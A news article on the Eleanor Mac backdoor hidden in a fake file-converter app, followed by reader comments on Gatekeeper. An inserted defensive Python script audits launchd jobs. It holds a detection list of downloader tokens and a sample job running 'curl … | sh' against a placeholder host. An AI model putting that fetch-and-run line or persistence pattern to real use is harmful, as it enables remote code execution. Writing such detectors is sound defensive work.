New Mac malware can remotely access FaceTime camera, but macOS Gatekeeper users are protected
A new piece of Mac-targeting malware is in the wild, potentially allowing hackers to remotely execute code and even control the FaceTime camera on a user's computer, but Apple's own Gatekeeper security blocks the unsigned app from launching under default settings.
The newly unleashed EasyDoc Converter installs several malicious components on a victim's computer -- but it isn't signed with an Apple-issued Developer ID certificate, which means Gatekeeper in macOS, at its default setting, will refuse to open it. Researchers at Bitdefender published an analysis detailing the malware package this week, dubbing it "Backdoor.MAC.Eleanor."
The malware is hidden inside a fake file converter application named "EasyDoc Converter.app." Once users install the nonfunctional software, it downloads a malicious script.
Following installation of the app, it will fetch a number of tools that can access the FaceTime camera, download files, execute commands, and even send emails with attached files.
The remote FaceTime camera access is possible through an open-source command-line camera capture tool known as "wacaw." EasyDoc Converter also sets up a Tor hidden service, which lets attackers reach and control the machine without knowing its public IP address.
However, users who have Apple's Gatekeeper security package enabled on their Mac -- as it is by default -- are said to be protected.
An Internet connection monitoring application like Little Snitch can be used to monitor and block incoming and outgoing transmissions, and utilities similar to Patrick Wardle's BlockBlock can alert on and block the persistent components that malware installs. AppleInsider tested an installation of the malware, and as of yet Apple's built-in XProtect has not been updated to stop the newly discovered malware.
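The persistence layer that BlockBlock watches for can also be audited by hand. The script below is an added example, not code from the article, Bitdefender or BlockBlock: it parses launchd property lists from the standard LaunchAgents and LaunchDaemons directories and flags the pattern commodity Mac backdoors rely on, namely an executable under a hidden path or outside the usual install locations, a job that launchd restarts if it is killed, or a shell one-liner that fetches and runs code at login. The trusted-path list, the token list and the sample plists are constructed assumptions for illustration, not indicators taken from Eleanor.

```python
"""Audit launchd property lists for malware-style persistence (added example).

The heuristics and the sample jobs below are constructed for illustration;
they are not indicators taken from any specific malware family.
"""
import plistlib
from pathlib import Path
from typing import Dict, List

# Directories launchd scans for per-user and system-wide jobs.
LAUNCH_DIRS = [
    Path.home() / "Library" / "LaunchAgents",
    Path("/Library/LaunchAgents"),
    Path("/Library/LaunchDaemons"),
]

# Legitimately installed executables normally live under one of these prefixes (assumption).
TRUSTED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Applications/", "/Library/Apple/")

# Tokens in ProgramArguments that usually mean "fetch and run code at login" (assumption).
DOWNLOADER_TOKENS = ("curl ", "wget ", "| sh", "| bash", "python -c", "perl -e", "osascript -e")


def program_path(job: dict) -> str:
    """Return the executable a launchd job starts: Program, else ProgramArguments[0]."""
    if job.get("Program"):
        return str(job["Program"])
    args = job.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def audit_job(job: dict) -> List[str]:
    """Return human-readable reasons a job looks suspicious; an empty list means nothing odd."""
    reasons: List[str] = []
    path = program_path(job)
    if not path:
        return ["no Program or ProgramArguments (malformed job)"]
    # Hidden path components (e.g. ~/Library/.something/) are a classic drop location.
    if any(part.startswith(".") for part in Path(path).parts[1:]):
        reasons.append(f"executable under a hidden path: {path}")
    if not path.startswith(TRUSTED_PREFIXES):
        reasons.append(f"executable outside standard install locations: {path}")
    # RunAtLoad + KeepAlive: launchd starts the job at login and restarts it if it is killed.
    if job.get("RunAtLoad") and job.get("KeepAlive"):
        reasons.append("RunAtLoad and KeepAlive set: restarts if killed")
    joined = " ".join(str(a) for a in job.get("ProgramArguments") or [])
    for tok in DOWNLOADER_TOKENS:
        if tok in joined:
            reasons.append(f"downloader/interpreter in arguments: {tok.strip()!r}")
    return reasons


def audit_plist_bytes(data: bytes) -> Dict[str, object]:
    """Parse one plist (XML or binary) and audit the job it describes."""
    job = plistlib.loads(data)
    return {"label": job.get("Label", "<no Label>"), "reasons": audit_job(job)}


def scan_directories(dirs=LAUNCH_DIRS) -> Dict[str, List[str]]:
    """Audit every .plist in the launchd directories that exist; report unparseable files too."""
    findings: Dict[str, List[str]] = {}
    for d in dirs:
        if not d.is_dir():
            continue
        for p in sorted(d.glob("*.plist")):
            try:
                result = audit_plist_bytes(p.read_bytes())
            except (plistlib.InvalidFileException, OSError, ValueError) as exc:
                findings[str(p)] = [f"could not parse: {exc}"]
                continue
            if result["reasons"]:
                findings[str(p)] = result["reasons"]
    return findings


# Constructed sample jobs (not real malware artefacts): a benign helper from an app bundle,
# an agent hidden under the user's Library folder, and a shell dropper that fetches code.
SAMPLE_JOBS = {
    "benign": {
        "Label": "com.example.app.helper",
        "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/helper", "--agent"],
        "RunAtLoad": True,
    },
    "hidden_agent": {
        "Label": "com.example.updater",
        "ProgramArguments": ["/Users/victim/Library/.hidden/agent", "--daemon"],
        "RunAtLoad": True,
        "KeepAlive": True,
    },
    "shell_dropper": {
        "Label": "com.example.sync",
        "ProgramArguments": ["/bin/sh", "-c", "curl -fsSL http://example.invalid/payload | sh"],
        "RunAtLoad": True,
    },
}


def audit_samples() -> Dict[str, List[str]]:
    """Round-trip each constructed sample through plistlib and audit it."""
    return {name: audit_plist_bytes(plistlib.dumps(job))["reasons"] for name, job in SAMPLE_JOBS.items()}


if __name__ == "__main__":
    for name, reasons in audit_samples().items():
        print(f"{name}: {reasons or 'clean'}")
    for path, reasons in scan_directories().items():
        print(f"{path}: {reasons}")
```

Run it on a Mac and the second loop reports real jobs from the launchd directories; on any other system those directories do not exist and only the constructed samples are audited. The downloader check matters because an agent whose executable is /bin/sh passes every path test and only the arguments reveal what it does.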
Today's revelation of the "Backdoor.MAC.Eleanor" malware is the second OS X-specific discovery in 2016, not including adware. In March, a bogus version of the BitTorrent client Transmission was uploaded to the project's own download server and was downloaded by unsuspecting users 6,500 times during its brief availability. It was ultimately stopped by an XProtect update, and removal instructions were posted by the legitimate Transmission developers.
Regarding the Backdoor.MAC.Eleanor installation, computer forensics expert Jonathan Zdziarski told The Register that the package "could be serious for users who ran the program, but of course the lesson (as always) is to be careful what you install on your computer."
The EasyDoc Converter application was removed from MacUpdate overnight, and was never available on the Mac App Store.
Comments
Gatekeeper is annoying.
I own my computer and I don’t want Apple telling me what I can download.
I’m a geek so I don’t need protection by Apple.
Did I miss any?
To be fair, those are all fair criticisms of most such software (well, maybe not the last one lol) so it's not that unreasonable for people who haven't used it to assume that Gatekeeper is just as bad as other such solutions. Especially if they lived through Vista. lol I'm a huge fan of Gatekeeper, though, and leave it on its most restrictive setting. Then when I install a new app, I have to right-click to open it. Once. Then it never bothers me again. Best of both worlds!
Unprotected sex can lead to AIDS.
Missed your "/s". Power (and no headache) to us -geeks- who prefer the iOS and macOS walled gardens. We can geek out without these headaches.
Even on the most restrictive setting (app store only) you can right click to specifically allow running of non app store (but recognized developers) apps
this flags the app as "ok" so it will run in the future without requiring the right click.
To run unrecognized developers' apps, right-click on the app to attempt to run it, which will be refused because of an unrecognized developer,
then go to the security and privacy settings (in system prefs) and an option to "run anyway" will be available, click that and the app will run (and be flagged as "ok" for future launches.)
Setting security to "App Store & identified developers" removes the necessity to first right click on the app to run recognized developers apps
There is NO functionality restriction to leaving app security on "Mac App Store" or "App Store & identified developers".
http://www.macrumors.com/2013/12/18/software-allows-hackers-to-activate-macbook-webcams-without-green-warning-light/
http://www.cultofmac.com/258855/alarming-study-shows-macs-camera-can-secretly-spy/
Edit: If Charlie Miller says it would require a “lot of work and resources," then it's really tough. As in darn near impossible.
This app runs as the local user and never gets access to the privileges needed even on versions of OS X that permitted updating the camera's firmware from inside.
Note that 'likely' means that no one has discovered a hack being used against Macs built after 2008, and has not been reported by or to anyone since 2013.
I recently downloaded some trialware on my Mac. The moment I double-clicked on the .dmg, GateKeeper said "uh, uh!" and I moved the .dmg to trash.
Let OS X do the hard work. Life's too short to worry about malware.
The sandbox restrictions can be a problem, especially for cross-platform apps, as they have to restrict the app to the sandboxed filesystem containers, and the developers are also identified with code signing; some developers wouldn't want that.
https://bombich.com/kb/ccc4/why-isnt-ccc-on-mac-app-store
Apple should be locking down sensitive folders like LaunchAgents and LaunchDaemons, this was used by the Mac Defender and Flashback malware too. Legitimate apps hardly ever use this functionality. It looks like they locked down dynamic library overrides with SIP in El Capitan. As soon as apps try to modify anything sensitive, the system should prompt the user about what it's doing. If it's leaving invisible folders around or dumping executables outside the Applications folder, at least let the user know what the app is doing. Apple can also keep an approved list of binaries and settings that are known from trusted publishers or known to be harmless and the system can check against this list regularly and have a system panel that shows warnings about unapproved settings that may be harmful. Having descriptions of processes and configurations would be nice too, Apple sometimes uses abbreviated names for system daemons and it's hard to tell if they are legitimate like secd, pbs, pkd, tccd. System processes approved or developed by Apple should be labelled in Activity Monitor and Get Info panels so it's easy to spot rogue processes.